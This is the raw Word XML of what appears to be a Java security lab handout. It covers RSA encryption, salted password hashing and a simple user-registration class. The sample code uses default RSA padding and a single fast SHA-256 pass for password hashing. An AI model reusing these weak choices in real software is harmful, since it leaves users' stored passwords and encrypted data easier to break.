      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A2BAFF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35EC927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4FBACFA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4CBDAC0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5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237EAC98" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB00155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743009F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FB651A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Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546299F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="274"/>
        <w:ind w:right="589"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Rivest-Shamir-Adleman)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asymmetric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8AA5C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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pair of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>keys: a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decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C7644" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74020FA7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RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F6ABD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664E8BE1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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RSAEncryption.java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keys,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>encrypt,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decrypt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6E5931EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDCF5E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="6114"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import java.security.*;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javax.crypto.Cipher; import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1E680" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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RSAEncryption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688478AA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="2040" w:hanging="480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KeyPair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generateKeyPair()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 KeyPairGenerator keyPairGenerator =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D160C7E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2222" w:hanging="96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KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(2048);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA057C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keyPairGenerator.generateKeyPair();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E11301" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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AA2E69B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="224" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080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encrypt(String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data,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PublicKey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publicKey)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 Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46758899" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="242" w:lineRule="auto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Cipher cipher = Cipher.getInstance("RSA"); cipher.init(Cipher.ENCRYPT_MODE,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publicKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26062994" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>byte[] encryptedBytes = cipher.doFinal(data.getBytes()); return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Base64.getEncoder().encodeToString(encryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575DDFE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="220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5D24133" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1C18E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="108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decrypt(String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encryptedData,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PrivateKey privateKey) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F3DB16" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cipher cipher = Cipher.getInstance("RSA"); cipher.init(Cipher.DECRYPT_MODE,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privateKey); byte[] decryptedBytes =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3428C94A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2222" w:hanging="96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cipher.doFinal(Base64.getDecoder().decode(encryptedData)); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return new String(decryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEDDBF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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44DB544" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="exact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2FB31E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="2040" w:right="1849" w:hanging="48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 KeyPair keyPair = generateKeyPair();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F74F55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originalData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"SecureMessage123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB23A8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4683AB37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encryptedData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encrypt(originalData,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keyPair.getPublic()); System.out.println("Encrypted Data: " + encryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C25E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="1080" w:right="783" w:firstLine="96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decryptedData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decrypt(encryptedData, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>keyPair.getPrivate());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38564530" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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System.out.println("Decrypted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Data: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decryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A92677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4358FE0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5DD6CC1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA1DC90" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="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6E975FD8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="273"/>
        <w:ind w:left="1079" w:hanging="359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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4044D203" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B399056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RSAEncryption.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A630583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23D75D5D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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 xml:space="preserve">Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18258C68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73884087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RSAEncryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D207793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7198180B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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the encrypted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decrypted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14:paraId="72DF4F6F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF755D3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Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA46D45" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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private keys securely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to prevent unauthorized </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100E660" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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digital signatures to verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the authenticity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messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92E9CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01208AA3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587339EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>◻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encrypts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decrypts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RSA,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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 xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782011B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713D1B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603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Java-based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hashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>passwords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salting for user login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041F58C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D75D34D" w14:textId="77777777" w:rsidR="00A16F47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C3809D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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hashed passwords with salting to enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE40EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556D399B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5A47DF0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3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(JDK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243E2B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(Eclipse,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Code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D51C8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5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417548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SQLite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0E137879" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0165DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1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7CADBA0E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC7A512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Hashed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Salting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914724B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="274"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hashing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>converts passwords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1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fixed-length string,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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>irreversible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4071570D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="564"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Salting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adds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hashing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3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>like rainbow table attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57256337" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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hashing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PBKDF2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bcrypt, or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256 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password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C187C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78242F46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Secure Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hashing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1F3695A8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C180003" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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PasswordHasher.java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hashing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passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC52C7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A487022" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="4861"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import java.security.SecureRandom;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java.security.MessageDigest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68028F15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="3449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java.security.NoSuchAlgorithmException; import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45380473" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110F983B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PasswordHasher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4FCADB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="652" w:right="532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final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SecureRandom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SecureRandom();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7625E89B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2759733A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="4139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generateSalt()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{ byte[] salt = new byte[16]; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>RANDOM.nextBytes(salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA647B8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Base64.getEncoder().encodeToString(salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A3AE7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C52A0B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EB4193" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080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hashPassword(String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password,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salt)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 NoSuchAlgorithmException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543F82BC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MessageDigest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MessageDigest.getInstance("SHA-256"); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>md.update(salt.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23875A70" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>byte[] hashedPassword = md.digest(password.getBytes()); return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Base64.getEncoder().encodeToString(hashedPassword);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA542FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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107EEFA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867CB75" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F50ACB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2"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ABC591" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC731E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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UserAuthentication.java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register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users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D160C1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981B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7111E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C8CA60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UserAuthentication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C08773B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="108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HashMap&lt;String,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String[]&gt;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userDatabase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new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2C84F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="108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registerUser(String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password) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B492E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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salt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PasswordHasher.generateSalt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69133250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hashedPassword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PasswordHasher.hashPassword(password,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E27A4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salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C38CBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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userDatabase.put(username,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String[]{hashedPassword,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salt}); System.out.println("User registered successfully!");</w:t>
